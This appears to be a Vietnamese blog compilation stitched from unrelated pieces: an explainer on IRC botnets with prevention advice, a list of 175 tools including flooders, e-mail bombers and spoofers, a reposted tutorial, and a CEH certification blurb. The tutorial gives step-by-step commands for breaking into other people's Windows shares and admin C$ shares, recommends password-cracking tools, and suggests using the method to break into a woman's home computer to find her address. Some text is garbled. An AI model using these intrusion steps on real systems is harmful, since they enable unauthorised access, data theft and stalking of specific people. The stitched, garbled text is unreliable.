Các botnet đã trở nên một phần quan trọng của Internet, tuy chúng ngày càng ẩn kĩ. Do đa số các mạng IRC truyền thống thực hiện các biện pháp cấm truy nhập đối với các botnet đã từng ngụ tại đó, những người điều khiển botnet phải tự tìm các server cho mình. Một botnet thường bao gồm nhiều kết nối, chẳng hạn quay số, ADSL và cáp, và nhiều loại mạng máy tính, chẳng hạn mạng giáo dục, công ty, chính phủ và thậm chí quân sự. Đôi khi, một người điều khiển giấu một cài đặt IRC server trên một site công ty hoặc giáo dục, nơi các đường kết nối tốc độ cao có thể hỗ trợ một số lớn các bot khác. Chỉ đến gần đây, phương pháp sử dụng bot để chỉ huy các bot khác mới phát triển mạnh, do đa số hacker không chuyên (script kiddie) không đủ kiến thức để sử dụng phương pháp này.
Một xu hướng rất nguy hiểm trong thời gian gần đây là kẻ tấn công sử dụng botnet gồm hàng ngàn máy tính ma (máy tính đã bị khống chế hay còn gọi là zombie) để tấn công từ trối dịch vụ, nhằm vào các hệ thống của doanh nghiệp, tổ chức, chính phủ. Để tạo ra đội quân zombie hùng hậu này, chúng sử dụng virus, spyware hay các trojan lây nhiễm qua Internet, khi máy tính bị nhiểm máy tính đó sẽ bị kiểm soát một cách bí mật, từ xa bởi các Trojan. Có rất nhiều phương pháp điều khiển và quản lý zombie từ xa. Trong khuôn khổ bài viết này tôi chỉ đề cập đến việc điều khiển và quản lý bằng Trojan thong quan các kênh riêng Internet Relay Chat (IRC).


*
o IRC botnet

Mỗi một máy bị kiểm soát,bị cài một phần mềm nguy hiểm bí mật kết nối đến kênh IRC của kẻ tấn công gọi là một bot. Mạng các các kết nối tới một kênh IRC gọi là một botnet.
Bot cũng đồng nghĩa với agent (tác tử) trong phương thức DDoS truyền thống. Các bot này được điều khiển thông qua kênh IRC nó kết nối đến. Một bot khi được cài lên máy của nạn nhân, nó sẽ kết nối ra ngoài theo các cổng của dịch vụ IRC và tham gia vào các kênh riêng do kẻ tấn công tạo ra. Các kênh này năm trên các mạng phổ biến như Efnet, Undernet hay DALnet. Các mạng này là một công cụ miễn phí, ổn định để kẻ tấn công dễ dàng mở rộng, quản lý, duy trì và điều khiển đội quân bot.
Mạng IRC cung cấp cho kẻ tấn công khẳ năng dẽ dàng và mềm dẻo để điều khiển hàng trăm thậm trí hàng ngàn bot.
Theo Australian CERT, điểm cực kỳ nguy hiểm là các bot hiện nay có thể tân dụng được băng thông rộng và tài nguyên dư thừa của máy nạn nhân, những bot này sẽ có khả năng cực kỳ mạnh mẽ. Botnet với nhiều bot mạnh này sẽ tạo ra một sức mạnh vô cùng ghê gớm, có khả năng đánh sập bất kỳ hệ thống nào.

*
o Các thành phần cơ bản của IRC Bot

Attack
Bản chất bot là một chương trình nguy hiểm đã được lây nhiễm vào máy tính nạn nhân và bị kiểm soát bởi kẻ tấn công. Các bot được cấu hình để kết nối vào một kênh IRC bí mật và đợi lệnh tấn công .
- Bot: thường là một file thực thi, có khả năng thực hiện một tập lệnh đã được lập trình trước. Các lệnh này thường tác động trực tiếp đến máy tính bị lây nhiễm như ẩn các tác vụ của người quản trị. Bot sẽ tự copy đến một thư mục bí mật và thay đổi cấu hình trên máy lây nhiễm cho phép nó tự động kích hoạt khi máy khởi động.
Ví dụ trên nền Widows bot sẽ kích hoạt một phiên bản của nó lúc máy tính khởi động bằng cách thêm thông tin vào Registry : HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows \CurrentVersion\Run\
Thông thường bản nén của một bot có kích thước không quá 15kb.
Bot được lây nhiễm dưới dạng virus, sâu máy tính các loại malware khác hay được phát tán từ các site độc hại, site bị hacker kiểm soát. Với cách phát tán từ các website bot được tự động tải về máy do các lỗi của trình duyệt hay do người dùng không biết và click vào. Hình ảnh sau cho thấy mã cử một website đã bị chèn một file thực thin guy hiểm tên là Trojan.exe


Hình 02 . Mã một trang phát tán mã độc


Hình 3. Các thành phần IRC BOT


- Máy nạn nhân (Victim machine, hay còn gọi là zombie hay máy tính ma): là một máy tính có kết nối internet, đã bị cài một phần mềm nguy hiểm đóng vai trò là một bot của một botnet. Phần mềm nguy hiểm này có thể được cài theo nhiều cách, một trong các cách đó là cách lây nhiễm kể trên. Hay bị cài do các lỗi của phần mềm, hệ điều hành và gần đây một cách rất phổ biến là lây qua USB.


- Kẻ tấn công (Attacker): là người đã tạo ra và phát tán bot, người điều khiển và ra lệnh cho các bot kết nối tới server,kênh IRC định trước, là người ra lệnh tấn công đối với các bot.


- Kênh điều khiển (Control channel): là một kênh IRC bí mật được kẻ tấn công tạo ra nhằm kết nối các máy tính đã kiểm soát thông qua các bot khi các máy tính này kết nối vào mạng.Thông tin về kênh này đã được định sẵn trong các bot hay các bot có cơ chế để tự động cập nhật thông tin về kênh này.


-Máy chủ IRC (IRC Server): là máy chủ cung cấp dịch vụ IRC. Một số nguồn cung cấp dịch vụ IRC phổ biến như DALNET ... Kẻ tấn công cũng có thể dựng một máy chủ riêng.


-Botnet : tất cả các bot khi kết nối tới kênh điều khiển tạo thành mộ mạng lớn các nút gọi là botnet. Botnet này sẽ ở trong trạng thái sẵn sằng chờ lệnh tấn công của kẻ tạo ra nó.


*
o Các mối nguy hiểm bot và botnet có thể tạo ra



Các hành động sau có thể được thực hiện bởi kẻ tấn công khi sử dụng bot và botbet:
-Tấn công từ chối dịch vụ (DoS attack): đây chính là lý do lớn nhất khiến kẻ xấu sử dụng IRC bot. Kẻ tấn công có thể sử dụng sức mạnh của đội quân zombie bằng cách điều khiển và phát lệnh tấn công tới mục tiêu. Có thể hạ gục mục tiêu bằng các dòng dữ liệu UDP, ICMP lớn hay gửi các yêu cầu đồng bộ làm lụt TCP gây ghẽn đường truyền.
- Tiếp tục lây nhiễm cục bộ : với bot đã có kẻ tấn công có thể chiếm toàn bộ quyền kiểm soát máy bị lây nhiễm. Kẻ tấn công có thể tải về và cài các chương trình gián điệp (spy ware), trojan, key log…để theo dõi máy, thu thập các thông tin nhạy cảm của nạn nhân như thông tin cá nhân, tài khoản ngân hàng, thẻ tín dụng…
- Tận dụng băng thông của nạn nhân:: một mục đích sử dụng thú vị khác là tận dụng băng thông và tài nguyên rỗi của nạn nhân. Đặc biệt là các máy có băng thông rộng. Thậm chí giữa các nhóm tấn công cũng trao đổi với nhau tài nguyên này.


- Của hậu (Backdoor): với kiểu tấn công này, botnet còn có khả năng ẩn dấu và mở các kêt nối bí mật ra ngoài, để kẻ tấn công có thể dễ dàng xâm nhập vào lần tiếp theo.


- Chứa dữ liệu bất hợp pháp :với xu hướng này, kẻ tấn công có thể tân dụng các bot làm các mạng chia sẻ file, tận dụng để lưu trữ file, phần mềm bất hợp pháp, các đoạn video riêng,…
Thêm nữa, với việc giám sá các bot, kẻ tấn công có thể một cách bí mật theo dõi các ISP.


- Gửi thư rác (spam mail) : đây thực sự là một thách thức lớn đối với các chuyên gia bảo mật. Theo thông tin mới nhất (10/2008) các mạng botnet trung bình một ngày gửi 60 tỉ thư rác chiếm 20% tổng số thư rác/ngày.


*
o Mục tiêu và nạn nhân chính của bot & botnet

Tất cả các nguồn kết nối tới internet đều có thể là mục tiêu tấn công của kẻ xấu. Các hệ thống sơ hở có thể bị lây nhiễm bot là các hệ thống ít giám sát, băng thông và tài nguyên lớn, các máy tính cá nhân sử dụng ở nhà, các máy tính cá nhân, các máy chủ ở các trường đại học.


- Hệ thống có băng thông lớn: một trong các loại nguồn kết nối đến internet là các máy có đường truyền băng thông rộng, những máy như thế này có thể được sử dụng để tấn công từ chối dịch vụ phân tán (DDoS) hay lưu trữ file, phần mềm.


- Hệ thống có tính sẵn sang cao: kẻ tấn công luôn thích những hệ thống,máy có tính sẵn sang cao như : thời gian kết nối vào mạng lớn, tài nguyên dồi dào. Những hệ thống như thế sẽ luôn sẵn sang cho việc tấn công.


- Các hệ thống ít được giám sát và quan tâm: các hệ thống ít được để ý, quan tâm đến như không cập nhật bản vá, không có phần mềm bảo vệ … Kẻ xấu có thể tạo ra các công cụ tự động để rà, quét và tấn công các mục tiêu này, biến các mục tiêu này thành một nút của một botnet mà chủ nhân của nó không hề hay biết.


- Các hệ thống có vị trí địa lý xa: kẻ tấn công thích kiểm soát các hệ thống, máy tính ở những vùng địa lý xa với nơi kẻ tấn công ở nhằm tránh luật pháp sở tại và cũng để tiện cho việc che dấu dấu vết.


*
o Quá trình lây nhiễm và điều khiển bot

Phần này sẽ trình bày cách thức kẻ tấn công sử dụng bot, tùy biến bot cho phù hợp với mục đích sử dụng; cách thức kiểm soát máy bạn nhân, quá trình lây nhiễm và điều khiển bot, cách tấn công sử dụng zombie …


Lập trình và thay đổi mã nguồn: quá trình này tùy thuộc vào khảnăng của kẻ tấn công. Bot do kẻ đó viết hay tận dụng lại của người khác và chỉnh sửa cho phù hợp với mục đích sử dụng. Các thông tin tùy chỉnh trên các bot hoặc các bot cập nhật là IRC server, cổng IRC TCP, tên của kênh, mật khẩu hoặc mã chứng thực.
Thêm nữa, tùy thuộc vào mục đích sử dụng, kẻ tấn công có thể thay đổi vị chí, tên file đặt trên máy tính đã bị lây nhiễm. Ở mức cao hơn nữa kẻ tấn công có thể sử dụng các kênh IRC động hay sử dụng nhiều kênh IRC. Để làm như vậy kẻ tấn công có thể sự dụng các dịch vụ tên miền động như dyndns.com hay no-ip.com để ánh xạ tên server của IRC với IP máy chủ của nó..




Hình 4. Quá trình lây nhiễm và điều khiển bot
Hình trên mô tả một bot được lây nhiễm như thế nào? Quá nhân bản qua một lượng lớn các máy khác để tạo nên mạng các bot hay mạng các zombie.


The attacker, attempts to infect the victim machines with bots through either exploiting some operating system/application vulnerability or trick the user into executing a malicious program leading to bots installation.
Kẻ tấn công sẽ có gắng kiểm soát và lây nhiễm phần mềm nguy hiểm lên máy nạn nhân thông qua các lỗ hổng của ứng dụng, hệ điều hành hay bằng một cách thức nào đó lừa người sử dụng chạy chương trình kich hoạt bot. Ví dụ : một số trang cung cấp các bản bẻ khóa phần mềm, các trang cho download miễn phí,… đi kèm với chúng là virus, phần mềm gián điệp,… Người sử dụng máy tính thiếu hiểu biết sẽ dễ dàng bị mắc lừa và kích hoạt bot.
(1) Cách cơ bản là kẻ tấn công làm lây nhiễm hàng hoạt và tự động một số lượng lớn các máy tính dựa trên mã khai thác lỗ hổng mà các máy này mắc phải. Sau đó kẻ tấn công có thể kiểm soát các máy này, cài phần mềm backdoor (của hậu) lên chúng và có thể dùng chúng là nguồn phát tán và lây nhiễm mã độc. Việc rà quét tự động và khai thác lỗ hổng có thể do phần mềm dạng sâu máy tính (worm) đảm nhiệm. Một cách khác là kẻ tấn công sử dụng các trang web, đặc biệt là các trang web lớn và uy tín mà chúng kiểm soát được, chúng sẽ chèn mã độc vào đó, người dùng thông thường đã có sự tin tưởng đối với những site này và dễ dàng chấp nhận việc download về máy tính khi có của sổ download hiện lên. Bản than chính phần mềm IRC cũng có thể đã bị chèn mã độc và và người dùng cài đặt cùng với IRC mà không hề hay biết.
Sauk khi cài đặt thành công trên máy nạn nhân, bot sẽ copy thành nhiều bản trên máy tính nạn nhân, cập nhật thông tin registry (trên windows).
Ở bước (2) bot sẽ thực hiện kết nối tới IRC server với nickname ngẫu nhiên, sử dụng khóa bí mật để kết nối vào kênh riêng mà kẻ tấn công đã thiết lập trước đó.


Nhiều khi kẻ tấn công có thể sử dụng các server IRC công cộng cho các hoạt động tấn công này, tất nhiên khi bị phát hiện thì người quản trị hệ thống này sẽ loại bỏ kênh đó và kẻ tấn công cũng sẽ mất đi đội quan zombie kết nối vào đó. Do đó để tranh việc này kẻ tấn công thường sử dụng các dịch vụ như dyndns.com, no -ip.com để ánh xạ động các bot đến nhiều server IRC (ở bước (3)).
Ở bước (4), bot đã hoàn tất việc cài đặt và kết nối, sẵn sàng chờ lệnh phát động từ người sở hưu nó (bước (5)).
Bước (6), kẻ tấn công truy nhập kênh kiểm soát duy trì và điều khiển các bot. Thông thường mật khẩu để điều khiển hệ thống bí mật này sẽ được mã hóa và có cơ chế bị botnet khó bị một kẻ khác chiếm đoạt mất quyền điều khiển.
Bước (7), kẻ tấn công điều khiển các zombie trực tiếp hoặc từ xa và phát lệnh tấn công mục tiêu. Tấn công phổ biến là tấn công từ chối dịch vụ (như minh họa trên), gửi thư rác, đánh cắp thông tin cá nhân,… Kẻ tấn công cố gắng tạo ra việc truy nhập mục tiêu từ các zombie càng giống thật càng tốt. Tấn công DDoS kiểu này, yêu cầu gửi đến mục tiêu xuất phát từ tất cả cá zombie với các IP khác nhau khiến việc xác định kẻ tấn công vô cùng khó khăn.


*
o Một số bot cơ bản

Phần này tôi liệt kê một số bot nguy hiểm chạy trên hệ điều hành windows.
Chi tiết có thể tham khảo them tại Trojan list sorted on action .
GTbot
Các thông tin them về GTbot có thể tham khảo tại http://swatit.org/bots/gtbot.html :
- sử dụng các chương trình mIRC hợp lệ
- dễ dàng viết lại hay chỉnh sửa các nội dung điều khiển
Tên gọi khác: W32.IRCBot,
Cổng (Ports): tự cấu hình
Sử dụng: Truy nhập từ xa / IRC trojan
Registers: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion\ Run\
Hệ điều hành chịu tác động: Wi ndows 95, 98, ME, NT, 2000, XP.




Hình 5. Minh họa tấn công sử dụng mIRC




















Evilbot

Hình 6. EvilBot v1.0
Nguồn : http://www.megasecurity.org/trojans/e/evilbot/Evilbot_a.html


Kích thước file nén: 15.904 bytes
Cổng (Ports): mặc định 6667 (có thể thay đổi)
Mục đích sử dụng: Truy nhập từ xa / IRC trojan / Công cụ tấn công DDoS / tải trojan về máy nạn nhân
Registers: HKEY_LOCAL_MACHINE \Software\Microsoft \Windows \CurrentVersion\ Run\ Hệ điều hành chịu tác động: Windows 95, 98, ME, NT, 2000 , XP.
Thông tin them:
http://securityresponse.symantec.com...or.evilbot.html


SlackBot
Tên gọi khác : Backdoor.Slackbot, DDOS/Slack, Troj/Slack, Slack,
Cổng (Ports): 6667 (có thể thay đổi)
Files: Slackbot.zip - Slackbot1_0.zip - Zwbv.exe - Sbconfig.exe -
Mục đích sử dụng: Truy nhập từ xa / IRC trojan / Công cụ tấn công DDoS / tải trojan về máy nạn nhân
Registers: HKEY_LOCAL_MACHINE \Software\Microsoft \Windows \CurrentVersion\ Run\ Hệ điều hành chịu tác động: tất cả các phiên bản của hệ điều hành windows cùng với các phần mềm IRC.


*
o Phòng chống bot và botnet

Phòng thử chống lại việc lây nhiễm và tấn công của bot chia làm 3 nội dung chính:


- Phòng ngừa: người sử dụng, những người quản trị hệ thống nên hiểu cơ chế lây nhiễm và phát tán các bot để có các phòng ngừa. Sử dụng các chương trình phát hiện, tiêu diệt virus, mã độc,…sử dụng hệ thống tường lửa, các hệ thống phát hiện xâm nhập,...
- Phát hiện: có thể phát hiện việc xuất hiện của bot bằng cách giám sát các tiến trình, giám sát băng thông và gói tin trong mạng. Xem các cảnh báo, log file từ các hệ thống cảnh báo, tường lửa,…
- Xử lý: xử lý khi phát hiện có bot, xử lý khi bị botnet tấn công


Đối với người dùng thông thường (Dạng Home user)
Phòng ngừa :
- Tuân thủ các chính sách bảo mật
- Cập nhật các bản vá các phần mềm trên máy
- Tham khảo thông tin cập nhật tại cert.org phần “Home Network Security” Home Network Security đây là những nội dung rất căn bản và hữu ích..
- Bật chế độ tự động cập nhật đối với hệ điều hành và phần mềm ứng dụng [theo CERT, 2001]
- Thao tác an toàn khi truy nhập mail, web, chat,… như không lưu mật khẩu..
- Sử dụng và cập nhật thường xuyên phần mềm diệt virus phổ biến.
- Sử dụng tường lửa và thiết lập các chế độ hợp lý.


Phát hiện :
- Cổng mặc định của IRC là 6667, cổng này có thể bị thay đổi. Dùng lệnh netstat – an trên cả Windows và Linux để kiểm tra các cổng ra vào mà máy tính đang sử dụng.
Ví dụ :
C:/windows> netstat – an
TCP your.mac hine.ip remote.irc.server.ip :6667 ESTABLISHED
Như trên thì có nghĩa là có kết nối IRC đến remote.irc.server.ip qua cổng 6667.
Các server IRC có thể lắng nghe trên các cổng 6000- 7000A169 4E
Đây cũng là cách để phát hiện các phần mềm gián điệp khác.
- Giám sát băng thông, gói tin trên mạng, các cổng kết nối. Có thể có một vài dấu hiệu như mạng chậm, tỉ lệ gói tin gửi đi và nhận được khác thường,…
- Phần mềm chống virus và phần mềm gián điệp có thể phát hiện ra chúng.
- Trong một số trường hợp có thể dùng các chương trình quét trực tuyến của các hang bảo mật lớn. [theo SYMANTEC]


Xử lý:


- Ngắt kết nối mạng của máy bị nhiễm mã độc, để tránh nguy cơ ảnh hưởng đến các máy cùng mạng.
- Cập nhật phần mềm diệt virus, kiểm tra xem nhà cung cấp hệ điều hành, phần mềm có bản vá hay không ?
- Nếu các chương trình diệt virus không phát hiện ra có thể dùng các công cụ hiển thị các tiến trình của máy tính để phát hiện và diệt bằng tay.
- Nếu trên máy có chứa các thông tin nhay cảm như tài khoản ngân hàng thì cần báo ngay cho nơi quản lý thẻ để tạm ngưng sử dụng hoặc nếu là mật khẩu thì cần đổi lại ngay.
- Nếu không xử lý được thì cần nhờ người có kỹ thuật xử lý.


Đối với quản trị hệ thống
Phòng chống:
- Áp dụng các chính sách bảo mật thông dụng.
- Theo hướng dẫn của nhà cung cấp hệ điều hành, phần mềm ứng dụng nâng cấp và cập nhật bản vá.
- Theo dõi thông tin về các lỗ hổng bảo mật trên các trang bảo mật uy tín, nhận thông tin bảo mật từ các mailing list bugtraq.
- Bật chế độ tự động cập nhật đối với hệ điều hành và phần mềm ứng dụng.
- Thao tác an toàn khi truy nhập mail, web, chat,… như không lưu mật khẩu.
- Sử dụng và cập nhật thường xuyên phần mềm diệt virus phổ biến.
- Sử dụng tường lửa và thiết lập các chế độ hợp lý.
- Cài đặt các phần mềm để giám sát hệ thống, phân tích log file hoạt động và truy nhập của hệ thống.
Phát hiện
- Sử dụng các kỹ thật như đối với người dùng thông thường.
- Thường xuyên giám sát log của hệ thống sử dụng, log của hệ thống giám sát, có cơ chế cảnh báo tự động cho người quản trị như gửi mail,…
- Giám sát mạng, dùng tường lửa chặn các cổng không cần thiết. một tiện ích nhỏ cho phép xem các cổng đóng mở ngoài netstat là fport của McAfee:
http://www.foundstone.com/knowledge/proddesc/fport.html
- Phân tích log của phần mềm bắt gói tin có thể phát hiện ra server và kênh bí mật của kẻ tấn công sử dụng, biết được mật khẩu kết nối IRC mã hóa hay không mã hóa.
- Tiến hành quét toàn bộ các máy tình nghi có chứa mã độc, rà soát, tìm và dỡ bỏ backdoor, rootkit.
- Tham khảo them tài liệu của Dave Dittrich, University of Washington
o “Dissecting Distributed Malware Networks “
url: http://security.isu.edu/ppt/pdfppt/Core02.pdf
o Security Incidents: World-wide distributed DoS and "warez" bot networks (fwd)::Security focus mailing list Date: May 03 2002
url: http://lists.insecure.org/lists/incidents/2002/May/0026.html


Xử lý :
- Sử dụng các kỹ thật như đối với người dùng thông thường.
- Cô lập các máy bị nhiễm sang một phân mạng riêng biệt.
- Lưu trữ và giữ an toàn dữ liệu, logs file của Firewalls, Máy chủ Mail , IDS, DHCP, proxy...
- Xử dụng phần mền bắt gói tin để phân tichs cách thức hoạt động của bot, phát hiện các máy bị lây nhiễm, nguồn gốc của nơi phát lệnh,…
- Liên hệ các trung tâm xử lý sự cố máy tính, các trung tâm an ninh mạng để cùng phối hợp giải quyết.


*
o Xu hướng phát triển của Bot và Botnet

Sử dụng mạng IRC để điều khiển zombie vẫn là một xu hướng lớn trong việc phát hiển các công cụ DDoS của kẻ xấu. Trong tài liệu [CERT, DOS_TRENDS] “Trends in Denial oFf8BS5er0v6icEe4 Att6a9ck4ETechnology” George M. Weaver & Kevin J. Houle đến từ CERT® Coordination Center trình bày rất rõ rang việc xây dụng và điều khiển các botnet sử dụng IRC. Tôi chỉ đưa lại một số điểm chính:.


Khả năng tồn tại – Đây là một vấn đề lớn được các kẻ tấn công rât quan tâm vì chi chí và công sức bỏ ra để xây dụng một botnet lớn là rất lớn. Giao thức Internet Relay Chat là một giao thức phổ biến và được sử dụng rộng rãi. Các mạng IRC công cộng lớn cùng với các dịch vụ tên miền động dyndns.com & no -ip.com được tận dụng làm cho các kênh sử dụng vào mục địch xấu khó bị phát hiện và dễ tùy biến đối với kẻ tấn công. Botnet dựa trên IRC khó bị phát hiện, giám sát và tiêu diệt. Do đó DDoS bằng IRC botbet nguy hiểm hơn DoS truyền thống rất nhiều.


Sự lây nhiễm và lan truyền— số lượng botnet ngày tăng, đồng thời với nó số nút (zombie) của botnet cũng tăng lên. Các botnet ngày càng tinh vi hơn. Các công cụ phát tán cũng tinh vi và nguy hiểm hơn. Đặc biệt là các công cu được phát triển cho phép tự động phát hiện lỗ hổng và lây nhiễm mã độc.


Mục đích sử dụng -- mục đích chính vẫn là DDoS, Spam mail, lấy chộm thông tin cá nhân, làm hệ thống chia sẻ file, phần mềm,…

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Xâm nhập máy tính đang Online là một kỹ thuật vừa dễ lại vừa khó . Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách
đáng kể và những máy họ không share thì không thể xâm nhập được, do đó
nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một
cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân
không share là dùng chương trình DOS để tấn công .

Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu .
--->>Các bước thực hiện:

(1). Vào Start ==> Run gõ lệnh cmd .
(2). Trong cửa sổ DOS hãy đánh lệnh “net view <IP của nạn nhân>”

+ VD : c:\net view 203.162.30.xx


(3). Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh
tiếp lệnh

net use <ổ đĩa bất kỳ trên máy của bạn> : <ip của nạn nhân><ổ share của
nạn nhân>

+ VD : c:\net use E : 203.162.30.xxC

(4). Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy
download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 .
(5). Nếu máy của nạn nhân không có share thì ta đánh lệnh :

net use <ổ đĩa bất kỳ trên máy của bạn> : <ip của nạn nhân>c$ (hoặc
d$)"administrator"

+ VD : net use E : 203.162.30.xxC$"administrator"

Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là
"administrator" .
(6). Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình
“thầm thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ
của cô nàng ( với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi
tìm được địa chỉ đó ) . Bạn chỉ cần chat Y!Mass rồi vào DOS đánh lệnh :

c:\netstat –n

Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass
với cô ta thôi , nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP
của cô ta . Sau đó bạn dùng cách xâm nhập mà tôi đã nói ở trên , chúc vui !

Theo blog quocky711

An ninh mạng - Hacker mũ trắng (CEH)
Thursday, May 21, 2009
CEH là từ viết tắt của Certified Ethical Hacker, một chứng chỉ uy tín về bảo mật của hãng Ec-Council. Với phương châm “Hiểu Hacker để chống hacker” - Điều này có nghĩa là một Ethical Hacker là một người kiểm tra các lỗi bảo mật của hệ thống và đưa ra các giải pháp phòng chống một cách hiệu quả và toàn vẹn. Một Ethical Hacker là người đảm nhận việc cố gắng tìm hiểu các kẽ hở bảo mật trong hệ thống mạng, hệ thống máy tính và sử dụng các công nghệ của Hacker để thâm nhập vào hệ thống, phân tích các kẽ hở bảo mật. Hacking là một tội nghiêm trọng tại Mỹ và nhiều nước trên thế giới. Khi một vụ tấn công thực sự xảy ra đó là một sự tương phản hoàn toàn với một Ethical Hacker. Ethical Hacker là người của tổ chức đó có thẩm quyền thâm nhập tấn công thử, phân tích và đưa ra giải pháp bảo mật cho tổ chức của họ. - Chương trình trong chứng chỉ CEH không tập chung vào một công nghệ của một nhà sản xuất nào mà nội dung của chứng chỉ đó xoay quanh các công nghệ bảo mật chung từ đó những người có chứng chỉ CEH sẽ tự tư duy trong mỗi trường hợp cụ thể trên những công nghệ cụ thể trong tổ chức của mình. CEH sẽ có sự hiểu biết sâu rộng về các ứng dụng như một nhà quản lý, giám sát, bảo mật, người quản trị trang web chuyên nghiệp, và là một người cần thiết trong một tổ chức nhằm xây dựng nên một hệ thống mạng an toàn. 